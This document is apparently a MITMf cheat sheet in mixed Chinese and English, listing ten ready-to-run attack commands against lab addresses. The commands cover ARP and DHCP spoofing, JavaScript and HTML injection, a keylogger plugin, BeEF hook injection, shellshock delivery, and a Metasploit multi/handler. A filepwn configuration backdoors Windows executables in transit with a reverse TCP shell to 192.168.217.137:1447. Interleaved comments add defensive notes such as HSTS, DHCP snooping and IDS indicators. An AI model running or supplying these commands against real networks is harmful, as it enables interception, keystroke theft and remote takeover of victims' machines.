# Clones the repository's current default branch into /opt/mitmf/. No tag or commit is
# pinned, so the code obtained is whatever the repository holds at clone time.
git clone https://github.com/byt3bl33d3r/MITMf.git /opt/mitmf/
1.
# ARP spoofing between target 192.168.217.129 and gateway 192.168.217.2 on eth0, with the
# inject plugin adding HTML from the given URL to the pages relayed to the target.
# Only traffic the relay can rewrite is affected: pages pinned to HTTPS through HSTS are
# not modified, and switch-level ARP inspection blocks the spoofing step itself.
./mitmf.py –iface eth0 –spoof –arp –gateway 192.168.217.2 –target 192.168.217.129 –inject –html-url http://www.freebuf.com
2.
# Same spoofing setup as the previous command; here the inject plugin adds a reference to
# an external script (test.js on the given host) instead of HTML.
./mitmf.py –iface eth0 –spoof –arp –gateway 192.168.217.2 –target 192.168.217.129 –inject –js-url http://linvex.xxx.cn/test.js
3.
# Same spoofing setup with the jskeylogger plugin, which adds keystroke-capturing
# JavaScript to the pages relayed to the target.
./mitmf.py –iface eth0 –spoof –arp –gateway 192.168.217.2 –target 192.168.217.129 –jskeylogger
4.
#msfconsole
# NOTE(review): Pass=abc123 is a guessable password for the Metasploit RPC service loaded
# here; whoever can reach that RPC port with it controls the framework. Use a long random
# value and keep the service reachable only from the host running mitmf.
msf > load msgrpc Pass=abc123
# javapwn plugin; msfip names the Metasploit host (192.168.217.137), presumably the
# instance whose RPC service was loaded above.
./mitmf.py –iface eth0 –spoof –arp –gateway 192.168.217.2 –target 192.168.217.129 –javapwn –msfip 192.168.217.137
5.
# Metasploit listener for the reverse connection: multi/handler on 192.168.217.137:1447.
# No PAYLOAD is set here, so the handler's default applies.
msfconsole
use exploit/multi/handler
set LHOST 192.168.217.137
set LPORT 1447
run
mitmf.conf 中与 filepwn 相关的配置片段(/usr/share/mitmf/config/mitmf.conf):
…………SNIP…………
[[[WindowsIntelx86]]]
# Settings for Windows x86 executables, presumably read by the filepwn run that follows.
PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
# HOST/PORT are the same address and port as LHOST/LPORT of the multi/handler listener above.
HOST = 192.168.217.137
PORT = 1447
SHELL = reverse_shell_tcp
SUPPLIED_SHELLCODE = None
# NOTE(review): a file patched in transit no longer matches the publisher's hash, and a
# signed file should no longer verify. Hash or signature verification and HTTPS-only
# downloads are the checks that catch this.
ZERO_CERT = False
PATCH_DLL = True
MSFPAYLOAD = windows/shell_reverse_tcp
…………SNIP…………
# Same spoofing setup with the filepwn plugin, presumably driven by the
# [[[WindowsIntelx86]]] settings shown above. Executables fetched over plain HTTP are the
# exposed case.
./mitmf.py –iface eth0 –spoof –arp –gateway 192.168.217.2 –target 192.168.217.129 –filepwn
6.
# DHCP spoofing with the shellshock option. Unlike the ARP commands, no gateway/target
# pair is given, so any DHCP client on the eth0 segment may receive the rogue offer.
# DHCP snooping on the switch and a patched bash on clients are the relevant controls.
./mitmf.py –iface eth0 –spoof –dhcp –shellshock
7.
# ARP spoofing between target 192.168.1.126 and gateway 192.168.1.1 with the screen
# plugin, which captures screenshots of the pages shown in the target's browser.
mitmf -i eth0 –spoof –arp –gateway 192.168.1.1 –target 192.168.1.126 –screen
8.
一个键盘记录 JS(应是指第 3 条 jskeylogger 模块注入的脚本;下面这条命令启用的是 browserprofiler)。使用 SSL/TLS(HTTPS)的网站无法记录,因为加密的响应在传输途中无法被插入脚本。
# browserprofiler plugin: collects browser and plugin details from the target's browser.
# It is not a keylogger; the note on the line above describes a different plugin.
mitmf -i eth0 –spoof –arp –gateway 192.168.1.1 –target 192.168.1.126 –browserprofiler
9.
恶搞模块,让浏览器中显示的图片上下翻转。
# upsidedownternet plugin: turns the images in relayed HTTP responses upside down.
mitmf –spoof –arp -i eth0 –gateway 192.168.1.1 –target 192.168.1.126 –upsidedownternet
10.
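XSS-style browser hooking with BeEF: the hook.js script is injected into plain-HTTP responses in transit rather than through a flaw in the visited site.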
# inject plugin loading hook.js from 192.168.1.158:3000, which the note above identifies
# as a BeEF server. Requests for /hook.js on port 3000 leaving a client are a
# straightforward proxy/IDS indicator for this setup.
mitmf -i eth0 –spoof –arp –gateway 192.168.1.1 –target 192.168.1.126 –inject –js-url http://192.168.1.158:3000/hook.js